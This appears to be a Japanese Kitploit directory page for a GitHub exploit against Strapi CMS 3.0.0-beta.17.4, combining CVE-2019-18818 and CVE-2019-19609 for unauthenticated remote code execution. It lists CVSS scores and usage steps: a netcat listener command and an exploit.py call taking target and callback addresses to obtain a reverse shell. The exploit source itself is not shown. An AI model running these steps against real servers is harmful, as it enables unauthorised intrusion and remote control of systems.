Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-19609 — Strapi CMS 3.0.0-beta.17.4 - 未認証のリモートコード実行 (CVE-2019-18818, CVE-2019-19609) | Kitploit
ツール/GitHubGitHub/glowbase/cve-2019-19609
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubglowbase/cve-2019-19609

CVE-2019-19609

Strapi CMS 3.0.0-beta.17.4 - 未認証のリモートコード実行 (CVE-2019-18818, CVE-2019-19609)

リポジトリを見る
214年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Strapi CMS エクスプロイト

このエクスプロイトは、Strapi CMS フレームワーク バージョン 3.0.0-beta-17.4 の 2 つの脆弱性を対象とし、認証なしのリモートコード実行(RCE)を可能にします。

 

脆弱性

CVE-2019-18818

忘れたパスワードに対する脆弱なパスワード回復メカニズム

CVSS: 9.8 - 緊急

詳細: https://nvd.nist.gov/vuln/detail/CVE-2019-18818

CVE-2019-19609

OS コマンドで使用される特殊要素の不適切な無害化('OS コマンドインジェクション')

CVSS: 7.2 - 高

詳細: https://nvd.nist.gov/vuln/detail/CVE-2019-19609

 

使用方法:

このエクスプロイトを実行する前に、以下のオプションで指定する lport で netcat リスナーを起動してください。

netcat リスナーの起動

root@kitploit:~
nc -lnvp <lport>

エクスプロイトの実行

root@kitploit:~
exploit.py <rhost> <lhost> <lport>
ツールをダウンロード